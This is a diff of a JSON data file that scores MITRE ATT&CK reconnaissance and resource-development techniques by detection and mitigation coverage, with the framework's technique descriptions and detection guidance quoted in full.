+                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18486,11 +41116,11 @@
                 ]
             },
             {
-                "tid": "T1583.003",
-                "name": "Acquire Infrastructure: Virtual Private Server",
-                "url": "https://attack.mitre.org/techniques/T1583/003",
-                "description": "Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.\n\nAcquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)",
-                "detection": "Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+                "tid": "T1592.003",
+                "name": "Gather Victim Host Information: Firmware",
+                "url": "https://attack.mitre.org/techniques/T1592/003",
+                "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18501,11 +41131,11 @@
                 ]
             },
             {
-                "tid": "T1583.004",
-                "name": "Acquire Infrastructure: Server",
-                "url": "https://attack.mitre.org/techniques/T1583/004",
-                "description": "Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.\n\nAdversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)",
-                "detection": "Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+                "tid": "T1592.004",
+                "name": "Gather Victim Host Information: Client Configurations",
+                "url": "https://attack.mitre.org/techniques/T1592/004",
+                "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18514,13 +41144,216 @@
                         "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
-            },
+            }
+        ],
+        "mitigations": [
             {
-                "tid": "T1583.005",
-                "name": "Acquire Infrastructure: Botnet",
-                "url": "https://attack.mitre.org/techniques/T1583/005",
-                "description": "Adversaries may buy, lease, or rent a network of compromised systems that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Adversaries may purchase a subscription to use an existing botnet from a booter/stresser service. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).(Citation: Imperva DDoS for Hire)(Citation: Krebs-Anna)(Citation: Krebs-Bazaar)(Citation: Krebs-Booter)",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05476190476190476,
+        "adjusted_score": 0.05476190476190476,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.0047619047619047615,
+            "detection_score": 0.01
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1592.001",
+        "name": "Gather Victim Host Information: Hardware",
+        "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://attack.mitre.org/techniques/T1195/003) or [Hardware Additions](https://attack.mitre.org/techniques/T1200)).",
+        "url": "https://attack.mitre.org/techniques/T1592/001",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1592",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1592.002",
+        "name": "Gather Victim Host Information: Software",
+        "description": "Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1592/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1592",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1592.003",
+        "name": "Gather Victim Host Information: Firmware",
+        "description": "Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).(Citation: ArsTechnica Intel) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+        "url": "https://attack.mitre.org/techniques/T1592/003",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1592",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.06428571428571428,
+        "adjusted_score": 0.06428571428571428,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1592.004",
+        "name": "Gather Victim Host Information: Client Configurations",
+        "description": "Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.\n\nAdversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1592/004",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Internet scanners may be used to look for patterns associated with malicious content designed to collect client configuration information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox)\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1592",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1593",
+        "name": "Search Open Websites/Domains",
+        "description": "Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1593",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1593.001",
+                "name": "Search Open Websites/Domains: Social Media",
+                "url": "https://attack.mitre.org/techniques/T1593/001",
+                "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18531,11 +41364,11 @@
                 ]
             },
             {
-                "tid": "T1583.006",
-                "name": "Acquire Infrastructure: Web Services",
-                "url": "https://attack.mitre.org/techniques/T1583/006",
-                "description": "Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.",
-                "detection": "Once adversaries leverage the web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
+                "tid": "T1593.002",
+                "name": "Search Open Websites/Domains: Search Engines",
+                "url": "https://attack.mitre.org/techniques/T1593/002",
+                "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18564,7 +41397,7 @@
         "nist_controls": [],
         "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
         "actionability_score": {},
@@ -18572,118 +41405,59 @@
         "prevalence_score": 0
     },
     {
-        "tid": "T1584",
-        "name": "Compromise Infrastructure",
-        "description": "Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.\n\nUse of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)",
-        "url": "https://attack.mitre.org/techniques/T1584",
+        "tid": "T1593.001",
+        "name": "Search Open Websites/Domains: Social Media",
+        "description": "Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.\n\nAdversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+        "url": "https://attack.mitre.org/techniques/T1593/001",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet. \n\nOnce adversaries have provisioned compromised infrastructure (ex: a server for use in command and control), internet scans may help proactively discover compromised infrastructure. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
             "PRE"
         ],
-        "data_sources": [
-            "Domain Name: Active DNS",
-            "Domain Name: Domain Registration",
-            "Domain Name: Passive DNS",
-            "Internet Scan: Response Content",
-            "Internet Scan: Response Metadata"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1584.001",
-                "name": "Compromise Infrastructure: Domains",
-                "url": "https://attack.mitre.org/techniques/T1584/001",
-                "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)",
-                "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1584.002",
-                "name": "Compromise Infrastructure: DNS Server",
-                "url": "https://attack.mitre.org/techniques/T1584/002",
-                "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)",
-                "detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1584.003",
-                "name": "Compromise Infrastructure: Virtual Private Server",
-                "url": "https://attack.mitre.org/techniques/T1584/003",
-                "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.",
-                "detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1584.004",
-                "name": "Compromise Infrastructure: Server",
-                "url": "https://attack.mitre.org/techniques/T1584/004",
